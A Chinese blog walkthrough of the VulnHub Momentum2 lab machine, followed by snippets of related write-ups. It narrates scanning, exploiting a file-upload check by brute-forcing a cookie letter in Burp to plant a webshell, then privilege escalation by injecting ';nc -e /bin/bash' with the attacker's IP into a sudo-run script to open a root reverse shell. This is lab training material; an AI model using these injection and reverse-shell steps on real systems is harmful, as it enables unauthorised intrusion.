vulnhub-Momentum2

已于 2022-04-03 01:59:27 修改
阅读量519 收藏
点赞数
文章标签: ssh php linux
于 2021-08-30 20:21:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/plant1234/article/details/119986206
版权

vulnhub-Momentum2靶机

首先先去下载靶机地址:
https://download.vulnhub.com/momentum/Momentum2.ova
下载完靶机,直接利用VMave导入打开

一,信息收集

首先确定自己的靶机为net模式,知道自己靶机所在网段

然后利用kali进行IP扫描:

nmap -sP 192.168.229.0/24

在这里插入图片描述
发现存活的IP,除去自己的IP
发现靶机IP:192.168.229.155

如果不能扫描出IP就查看这篇博客:
https://hackergu.com/vulnhub-ip/

然后,收集靶机信息
利用:

nmap -sS -sV -T5 -A -p- 192.168.229.155

在这里插入图片描述

得到靶机开放的端口,22远程ssh连接端口和80端口,和操作系统

因为有80端口,所以直接访问网址:192.168.229.155
得到:

在这里插入图片描述查看网页没有什么有用信息,于是就扫描后台发现存在的网址

(这里也可以利用kali自带的dirbuster,进行扫描):
在这里插入图片描述

发现.bak是备份文件
还有:http://192.168.229.155/dashboard.html
和:http://192.168.229.155/owls/
地址

查看一下发现:

http://192.168.229.155/dashboard.html是一个上传页面:

在这里插入图片描述
得到一个备份文件:

http://192.168.229.155/ajax.php.bak

在这里插入图片描述

还有就是目录地址:

在这里插入图片描述

我们先查看上传文件处是否存在文件上传漏洞:

发现不能上传一句话木马:
在这里插入图片描述
但上传.txt文件却成功了:
在这里插入图片描述

并且在http://192.168.229.155/owls/目录发现自己上传的文件:
在这里插入图片描述

我查看备份文件发现:

在这里插入图片描述

这里给出了上传文件的要求,首先要有cookie值并且为
admin=&G6u@B6uDXMq&Ms加上一位大写字母
其次是要POST一个secure的参数值为:val1d这样就返回1,表示上传

于是这里我们就利用Bp进行抓包修改:

首先添加cookie值,并添加一个要修改的地方:
在这里插入图片描述

在添加一个POST请求值,这里记住用自己的这
-----------------------------40911969173602388051919423628

分开POST请求的值和上传的文件的值:
在这里插入图片描述

然后在进行爆破admin最后的大写字母,这里就用bp自带的大写字母
爆破:

在这里插入图片描述

得到为R时上传成功

查看shell是否在目录:

在这里插入图片描述
发现成功上传,访问shell得到:

在这里插入图片描述

请求一个参数试试:

在这里插入图片描述

成功执行命令,于是直接上蚁剑连接得到:

在这里插入图片描述

查找有用信息得到第一个flag:

在这里插入图片描述

并发现一个密码:

在这里插入图片描述

但不完全myvulnerableapp[Asterisk]中[Asterisk]表示‘ * ’号
于是就猜测账户:athena,密码:myvulnerableapp*

测试一下:
在这里插入图片描述

发现成功登陆,然后查看一下权限一下发现:

在这里插入图片描述

可以无密码运行cookie-gen.py文件
查看一下cookie-gen.py文件:

在这里插入图片描述

发现是一个脚本,运行后会要输入seed的值,这个值会echo到log.txt文件中,并且会执行bash命令,可以直接反弹shell

然后我们就利用nc监听
nc-使用方法就不在缀诉
直接在kali上用:nc -lvvp 6666
监听

在这里插入图片描述

然后在靶机运行cookie-gen.py:
sudo python3 /home/team-tasks/cookie-gen.py
得到:
在这里插入图片描述

在输入监听的机器:
;nc -e /bin/bash 192.168.229.153 6666
在这里插入图片描述

在回到监听的机器,就可以发现提权完成,得到flag:

在这里插入图片描述

在这里插入图片描述

南冥~
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
VulnHub靶场-Momentum: 2
hxync的博客
08-10 541
靶场下载地址:Momentum: 2 下好之后导入virtualbox启动 照例先扫一下主机 扫到靶机的ip地址为192.168.1.15 扫一下端口,开放了22和80端口 浏览器访问一下80端口 发现没有什么有用的信息,源码也看了一下,也没什么有用的信息 dirbuster扫一下目录 发现了一个文件上传的页面 一个备份文件 一个js文件 代码内容大概是当cookie存在且值为后面给出的那个字符串,注释部分有说明还需在字符串后面加一个大写字母,再用POST提交一个secure参数,参数的值
vulnhubMomentum2
qwweggfe的博客
08-02 263
Momentum2 信息搜集: 首先进行Ip扫描 打开网页进行查看 进行端口扫描 发现他开启了22和80端口 进行目录扫描:gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.181.140/ -x html,php,bak,txt -t 20 渗透测试 在/dashboard.html发现可以文件上传 发现可以上传txt...
Momentum靶机系列Momentum2
最新发布
m0_74950307的博客
05-06 1035
所以只需要上传一个监听代码就可以进行对靶机的监听,而且还获得了root权限:所以运行该脚本,并输入;//使用 open() 方法设置请求的类型为 POST,URL 为 "ajax.php",并指定使用异步方式发送请求(第三个参数为 true)//formData.append() 是 FormData 对象提供的方法,用于向表单数据对象中添加字段和值。简单来说就是,存在文件上传,上传的文件会添加到表单文件中 而且要想上传文件后就需要进行这串代码的过滤。//老板让我在饼干的末尾再添加一个大写字母。
[Vulnhub]Momentum2
cosmoslin的博客
11-18 1384
信息搜集 1.netdiscover 扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考 https://blog.csdn.net/qq_45290991/article/details/114189156 然后顺利扫到ip 2.masscan masscan --rate=10000 --ports 0-65535 192.168.131.133 3.nmap nmap -A 192.168.131.133 网站测试 尝试目录扫描 dirb,御剑等扫描无结果 gobuster dir -u
靶场练习第二十二天~vulnhub靶场之Momentum-2
qq_57976347的博客
02-20 629
一、准备工作 靶机下载地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看开放的端口和协议:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,寻找隐藏的网站 gobuster dir -u http://192.168.101.114/ -x html,php,txt,php.bak,bak -w /usr/share
VulnHub靶机_MOMENTUM: 2
学术渣渣的博客
09-05 633
文章目录靶机介绍渗透过程靶机IP获取端口扫描信息收集信息1信息2burpsuite抓包改包 靶机介绍 这个是Momentum系列的第二个靶机,第一个靶机详见:Momentum:1 下载地址:http://www.vulnhub.com/entry/momentum-2,702/ 难度:中等 描述:关键词curl, bash, code review 渗透过程 靶机IP获取 靶机的IP为192.168.1.105。 arp-scan -l 端口扫描 靶机开放了22和80端口。 nmap -A -T4 -p
google -Momentum插件
03-27
可以当时间桌面用
Impulse-and-Momentum
04-06
冲动和动量
Orbital-angular-momentum-based reconfigurable optical switching and routing
02-07
Orbital angular momentum (OAM) has gained interest due to its potential to increase capacity in optical communication systems as well as an additional domain for reconfigurable networks. This is due ...
value-momentum
03-16
value-momentum
ADS2012-Momentum电磁仿真实验教程
01-17
ADS2012-Momentum电磁仿真实验教程,分享给有需要的同学~
vulnhub--Momentum:2
venu_s的博客
07-09 604
靶机介绍 difficult:medium keywords:curl、bash、code review download:https://www.vulnhub.com/entry/momentum-2,702/ 信息探测 主机发现 netdiscover -i eth0 -r 192.168.187.0/24 端口扫描,开放了22和80端口 目录扫描 gobuster dir -u http://192.168.187.171/ -x html,php,bak,txt --wordlist /usr
MOMENTUM: 2 vulnhub walkthrough
xdeclearn的博客
07-19 348
信息 Momentum2.ova (Size: 698 MB) Download (Mirror): https://download.vulnhub.com/momentum/Momentum2.ova Download (Torrent): https://download.vulnhub.com/momentum/Momentum2.ova.torrent ( Magnet) 端口扫描和目录扫描 PORT STATE SERVICE 22/tcp open ssh 80/tcp open
看完这篇 教你玩转渗透测试靶机Vulnhub——Momentum:2
Aluxian_的博客
09-09 736
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。PS:这个是Momentum系列一共有2个靶机,分别是1.2老样子需要获得root权限找到flagmedium。
Momentum2-靶机
薛定谔嘚喵博客
04-09 358
本靶机通过信息收集发现文件上传漏洞,并找到上传点,通过Burp爆破Cookie以上传webshell,最后通过python3提权。信息收集dirsearch以及御剑目录扫描文件上传漏洞利用crunch生成小字典BurpSuite爆破cookiesudo -l查看当前的权限,发现可以使用python3提权。
靶机渗透练习81-Momentum:2
hirak0的博客
04-24 996
靶机描述 靶机地址:https://www.vulnhub.com/entry/momentum-2,702/ Description Difficulty : medium Keywords : curl, bash, code review This works better with VirtualBox rather than VMware 一、搭建靶机环境 攻击机Kali: IP地址:192.168.9.7 靶机: IP地址:192.168.9.79 注:靶机与Kali的IP地址只
Momentum:2靶机渗透测试
weixin_49340699的博客
07-13 518
Momentum:2靶机渗透测试流程 流程 用netdiscover对目标网段进行扫描 得到目标主机192.168.19.140 使用nmap对该主机进行端口扫描 得到端口22与80端口是开启的 上80端口看到只有三张图片就对目录进行爆破 gobuster dir -u http://192.168.19.140/ -x html,php,bak,txt --wordlist /usr/share/wordlist/dirbusters/directory-list-2.3-medium.txt ht
vulnhub之momentum
weixin_54431413的博客
06-25 518
js脚本信息泄露,AES解密,在线平台codepen.io,端口服务和进程查看命令,redis未授权访问。scp命令。
VulnHub靶机_MOMENTUM: 1
学术渣渣的博客
09-02 707
文章目录靶机介绍渗透过程获取靶机ip端口扫描扫描网站目录XSS攻击ssh登录提权 靶机介绍 下载地址:http://www.vulnhub.com/entry/momentum-1,685/ 难度:简单 格式:Virtualbox - OVA 渗透过程 获取靶机ip 首先扫描靶机的IP为192.168.1.107。 arp-scan -l 端口扫描 进行端口扫描,靶机开放了22和80端口。 nmap -A -T4 -p 1-65535 192.168.1.107 扫描网站目录 首先扫描一下这个网站的
%计算Momentum %1、动量-近一个月收益,近一个月收益取对数,再相加(测量为最近6天) Momentum1M(i_code,:)=0; if length(Stock_Pct_PastRecord)>22 && (Date_PastRecord(length(Date_PastRecord))-Date_PastRecord(length(Date_PastRecord)-20))<50 for i_mom=(length(Stock_Pct_PastRecord)-20):length(Stock_Pct_PastRecord) Momentum1M(i_code,:)=Momentum1M(i_code,:)+log(1+Stock_Pct_PastRecord(i_mom)); end end
07-14
根据给出的代码片段,可以看出这段代码是用来计算动量(Momentum)的。具体的计算步骤如下: 1. 初始化一个名为`Momentum1M`的变量,用于保存动量值。 2. 检查`Stock_Pct_PastRecord`的长度是否大于22,并且最近的日期与过去记录中倒数第20个日期之间的天数小于50。这是为了确保有足够的过去数据进行计算,并且最近的日期不超过50天。 3. 如果满足上述条件,则使用一个循环来计算动量: - 从`Stock_Pct_PastRecord`的倒数第20个位置开始,遍历到最后一个位置。 - 在每次循环中,将对数化后的近一个月收益(`log(1+Stock_Pct_PastRecord(i_mom))`)累加到`Momentum1M`中。 4. 最终得到的`Momentum1M`即为动量值。 请注意,这段代码是基于MATLAB语言编写的,如果要在Python中实现相同的功能,需要进行相应的转换和调整。 希望对您有所帮助!如果您有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值